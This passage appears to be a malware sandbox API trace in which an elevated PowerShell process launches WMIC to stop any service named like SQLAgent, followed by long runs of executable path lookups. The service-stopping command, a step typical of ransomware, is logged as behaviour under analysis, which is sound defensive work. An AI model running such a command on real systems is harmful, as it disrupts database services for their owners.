Length=0xa | out: Destination=0x1b9cc7b0) [0242.798] CoTaskMemFree (pv=0x1b9cc7b0) [0242.798] lstrlenW (lpString="Win32_Service") returned 13 [0242.798] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0242.798] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0242.798] CoTaskMemFree (pv=0x1b9b1010) [0242.798] lstrlenW (lpString="where") returned 5 [0242.798] CoTaskMemAlloc (cb=0xe) returned 0x1b9cc7b0 [0242.798] RtlMoveMemory (in: Destination=0x1b9cc7b0, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9cc7b0) [0242.798] CoTaskMemFree (pv=0x1b9cc7b0) [0242.799] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0242.799] CoTaskMemAlloc (cb=0x34) returned 0x1b9c7170 [0242.799] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x32 | out: Destination=0x1b9c7170) [0242.799] CoTaskMemFree (pv=0x1b9c7170) [0242.799] lstrlenW (lpString="call") returned 4 [0242.799] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc7b0 [0242.799] RtlMoveMemory (in: Destination=0x1b9cc7b0, Source=0x1ee806, Length=0xa | out: Destination=0x1b9cc7b0) [0242.799] CoTaskMemFree (pv=0x1b9cc7b0) [0242.799] lstrlenW (lpString="stopservice") returned 11 [0242.799] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0242.799] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee810, Length=0x18 | out: Destination=0x1b9b1010) [0242.799] CoTaskMemFree (pv=0x1b9b1010) [0242.799] LocalFree (hMem=0x1ee760) returned 0x0 [0242.800] CoTaskMemAlloc (cb=0x804) returned 0x1b9dbda0 [0242.800] GetConsoleTitleW (in: lpConsoleTitle=0x1b9dbda0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0242.800] CoTaskMemFree (pv=0x1b9dbda0) [0242.800] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0242.800] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c9cdfa0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30e6cd0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice", lpProcessInformation=0x30e6cd0*(hProcess=0x500, hThread=0x4fc, dwProcessId=0xadc, dwThreadId=0xb70)) returned 1 [0242.804] CoTaskMemFree (pv=0x253f20) [0242.805] CloseHandle (hObject=0x4fc) returned 1 [0242.805] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0242.805] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9ce048, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9ce048) returned 0x4550 [0242.806] CoTaskMemFree (pv=0x1b9b1010) [0242.806] GetCurrentProcess () returned 0xffffffffffffffff [0242.806] GetCurrentProcess () returned 0xffffffffffffffff [0242.806] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x500, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9ce128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9ce128*=0x4fc) returned 1 [0243.720] CloseHandle (hObject=0x4fc) returned 1 [0243.720] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x1c9ce198 | out: lpExitCode=0x1c9ce198*=0x0) returned 1 [0243.720] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0243.722] CloseHandle (hObject=0x500) returned 1 [0243.722] SetEvent (hEvent=0x4cc) returned 1 [0243.722] SetEvent (hEvent=0x4c0) returned 1 [0243.722] SetEvent (hEvent=0x4c4) returned 1 [0243.722] SetEvent (hEvent=0x4c8) returned 1 [0243.722] SetEvent (hEvent=0x4dc) returned 1 [0243.723] SetEvent (hEvent=0x4d0) returned 1 [0243.723] SetEvent (hEvent=0x4d4) returned 1 [0243.723] SetEvent (hEvent=0x4d8) returned 1 [0243.723] SetEvent (hEvent=0x4e0) returned 1 [0243.723] CoUninitialize () Thread: id = 152 os_tid = 0x488 [0243.754] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0243.756] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0243.757] VirtualQuery (in: lpAddress=0x1c96d900, lpBuffer=0x1c96e7c0, dwLength=0x30 | out: lpBuffer=0x1c96e7c0*(BaseAddress=0x1c96d000, AllocationBase=0x1bfe0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.759] VirtualQuery (in: lpAddress=0x1c96dbb0, lpBuffer=0x1c96ea70, dwLength=0x30 | out: lpBuffer=0x1c96ea70*(BaseAddress=0x1c96d000, AllocationBase=0x1bfe0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0243.762] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0243.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.762] CoTaskMemFree (pv=0x2af7b0) [0243.762] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0243.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.762] CoTaskMemFree (pv=0x2af7b0) [0243.763] CoTaskMemAlloc (cb=0x20e) returned 0x2baa30 [0243.763] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2baa30 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.763] CoTaskMemFree (pv=0x2baa30) [0243.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.763] SetErrorMode (uMode=0x1) returned 0x1 [0243.764] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.764] SetErrorMode (uMode=0x1) returned 0x1 [0243.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.765] SetErrorMode (uMode=0x1) returned 0x1 [0243.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.765] SetErrorMode (uMode=0x1) returned 0x1 [0243.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.766] SetErrorMode (uMode=0x1) returned 0x1 [0243.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.766] SetErrorMode (uMode=0x1) returned 0x1 [0243.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.766] SetErrorMode (uMode=0x1) returned 0x1 [0243.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.767] SetErrorMode (uMode=0x1) returned 0x1 [0243.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.767] SetErrorMode (uMode=0x1) returned 0x1 [0243.767] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.767] SetErrorMode (uMode=0x1) returned 0x1 [0243.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.768] SetErrorMode (uMode=0x1) returned 0x1 [0243.768] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.768] SetErrorMode (uMode=0x1) returned 0x1 [0243.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.768] SetErrorMode (uMode=0x1) returned 0x1 [0243.769] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.769] SetErrorMode (uMode=0x1) returned 0x1 [0243.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.769] SetErrorMode (uMode=0x1) returned 0x1 [0243.769] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.770] SetErrorMode (uMode=0x1) returned 0x1 [0243.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.770] SetErrorMode (uMode=0x1) returned 0x1 [0243.770] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.770] SetErrorMode (uMode=0x1) returned 0x1 [0243.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.771] SetErrorMode (uMode=0x1) returned 0x1 [0243.771] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.771] SetErrorMode (uMode=0x1) returned 0x1 [0243.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.771] SetErrorMode (uMode=0x1) returned 0x1 [0243.771] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.772] SetErrorMode (uMode=0x1) returned 0x1 [0243.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.772] SetErrorMode (uMode=0x1) returned 0x1 [0243.772] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.772] SetErrorMode (uMode=0x1) returned 0x1 [0243.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.773] SetErrorMode (uMode=0x1) returned 0x1 [0243.773] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.773] SetErrorMode (uMode=0x1) returned 0x1 [0243.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.774] SetErrorMode (uMode=0x1) returned 0x1 [0243.774] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.774] SetErrorMode (uMode=0x1) returned 0x1 [0243.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0243.774] SetErrorMode (uMode=0x1) returned 0x1 [0243.774] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.775] SetErrorMode (uMode=0x1) returned 0x1 [0243.775] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.775] SetErrorMode (uMode=0x1) returned 0x1 [0243.775] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.775] SetErrorMode (uMode=0x1) returned 0x1 [0243.776] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.776] SetErrorMode (uMode=0x1) returned 0x1 [0243.776] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.776] SetErrorMode (uMode=0x1) returned 0x1 [0243.776] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.776] SetErrorMode (uMode=0x1) returned 0x1 [0243.777] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.777] SetErrorMode (uMode=0x1) returned 0x1 [0243.777] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.777] SetErrorMode (uMode=0x1) returned 0x1 [0243.777] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.778] SetErrorMode (uMode=0x1) returned 0x1 [0243.778] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.778] SetErrorMode (uMode=0x1) returned 0x1 [0243.778] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.778] SetErrorMode (uMode=0x1) returned 0x1 [0243.778] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.779] SetErrorMode (uMode=0x1) returned 0x1 [0243.779] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.779] SetErrorMode (uMode=0x1) returned 0x1 [0243.779] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.779] SetErrorMode (uMode=0x1) returned 0x1 [0243.779] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.780] SetErrorMode (uMode=0x1) returned 0x1 [0243.780] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.780] SetErrorMode (uMode=0x1) returned 0x1 [0243.780] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.780] SetErrorMode (uMode=0x1) returned 0x1 [0243.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.781] SetErrorMode (uMode=0x1) returned 0x1 [0243.781] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.781] SetErrorMode (uMode=0x1) returned 0x1 [0243.781] 